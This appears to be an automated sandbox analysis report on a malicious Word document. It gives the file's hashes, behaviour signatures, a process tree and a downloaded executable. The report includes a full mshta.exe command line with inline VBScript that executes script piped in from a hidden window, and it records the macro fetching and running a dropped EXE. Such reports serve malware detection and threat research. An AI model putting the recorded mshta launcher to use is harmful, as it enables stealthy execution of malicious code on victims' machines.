Analysis
max time kernel: 148s
max time network: 137s
platform: windows10_x64
resource: win10v20210410
submitted: 12-05-2021 14:02

Tasks:
- Static task static1
- Behavioral task behavioral1: Sample 7abe6d89_by_Libranalysis.doc, Resource win7v20210408
- Behavioral task behavioral2: Sample 7abe6d89_by_Libranalysis.doc, Resource win10v20210410

General
Target: 7abe6d89_by_Libranalysis.doc
Size: 68KB
MD5: 7abe6d890f58d5a0b421edb2d4eed932
SHA1: a9c31dbfd581bcbb7236c828c6cc9dac13dbc6be
SHA256: 02e62eeb73ac0c0fa55cc203fbee23420a848cf991106eca3f75e8863a0cb4e5
SHA512: 488a7397cf9644c42a8b5a831f4a0e3a2ad99fc4cb7fe4d617ee8bd4085459f54a34be868c752c57375bba10e6dfa9ac5f7424aa0bb233943c1cb48f5d95bebc
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process; pid: 2272; pid_target: 3680; process: mshta.exe; target process: WINWORD.EXE

Blocklisted process makes network request (3 IoCs)
Processes:
- flow: 25; pid: 2272; process: mshta.exe
- flow: 27; pid: 2272; process: mshta.exe
- flow: 28; pid: 2272; process: mshta.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
Processes:
- pid: 3952; process: task-2225.exe

Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- description: File opened (read-only); process: WINWORD.EXE; ioc: \??\B:, \??\J:, \??\K:, \??\M:, \??\N:, \??\X:, \??\E:, \??\H:, \??\I:, \??\U:, \??\V:, \??\W:, \??\T:, \??\A:, \??\F:, \??\G:, \??\O:, \??\Q:, \??\R:, \??\S:, \??\Y:, \??\L:, \??\P:, \??\Z:

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; process: WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- description: Key opened; ioc: \REGISTRY\MACHINE\Hardware\Description\System\BIOS; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; process: WINWORD.EXE
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; process: WINWORD.EXE

Script User-Agent (3 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
- description: HTTP User-Agent header; flow: 25; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- description: HTTP User-Agent header; flow: 27; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- description: HTTP User-Agent header; flow: 28; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
- pid: 3680; process: WINWORD.EXE (2 occurrences)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
- description: Token: SeShutdownPrivilege; pid: 3680; process: WINWORD.EXE
- description: Token: SeCreatePagefilePrivilege; pid: 3680; process: WINWORD.EXE

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
- pid: 3680; process: WINWORD.EXE (2 occurrences)

Suspicious use of SetWindowsHookEx (18 IoCs)
Processes:
- pid: 3680; process: WINWORD.EXE (18 occurrences)

Suspicious use of WriteProcessMemory (7 IoCs)
Processes:
- description: PID 3680 wrote to memory of 1364; pid: 3680; process: WINWORD.EXE; target process: splwow64.exe (2 occurrences)
- description: PID 3680 wrote to memory of 2272; pid: 3680; process: WINWORD.EXE; target process: mshta.exe (2 occurrences)
- description: PID 2272 wrote to memory of 3952; pid: 2272; process: mshta.exe; target process: task-2225.exe (3 occurrences)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7abe6d89_by_Libranalysis.doc" /o ""
  PID: 3680
  Signatures:
  - Enumerates connected drives
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  Children:
  - C:\Windows\splwow64.exe (depth 2)
    Command line: C:\Windows\splwow64.exe 12288
    PID: 1364
  - C:\Windows\SYSTEM32\mshta.exe (depth 2)
    Command line: mshta.exe "about:<script language=VBScript>moveTo 0,-9999:Execute(CreateObject("Scripting.FileSystemObject").GetStandardStream(0).ReadAll()):sub window_onload:Close:End Sub</script><hta:application showintaskbar=no />"
    PID: 2272
    Signatures:
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    Children:
    - C:\Users\Admin\AppData\Local\Temp\task-2225.exe (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\task-2225.exe"
      PID: 3952
      Signatures:
      - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\task-2225.exe
  MD5: 0733d419a18124833b92af75d65d42a4
  SHA1: 2d69faba27d0f57c22642efc3bb4a7388a7270e5
  SHA256: c9b807b28e1fee284104356f934b030a5739844b910a9441a5b104df6ab24c4c
  SHA512: d58ebbc8914447a35a1d3340e8c67d5c858010ff4a66a66c3dac654b6f9af7779945561b64ccd8b2d3250404a68cbeffebf4e70904f8e91f893a35435cb49b05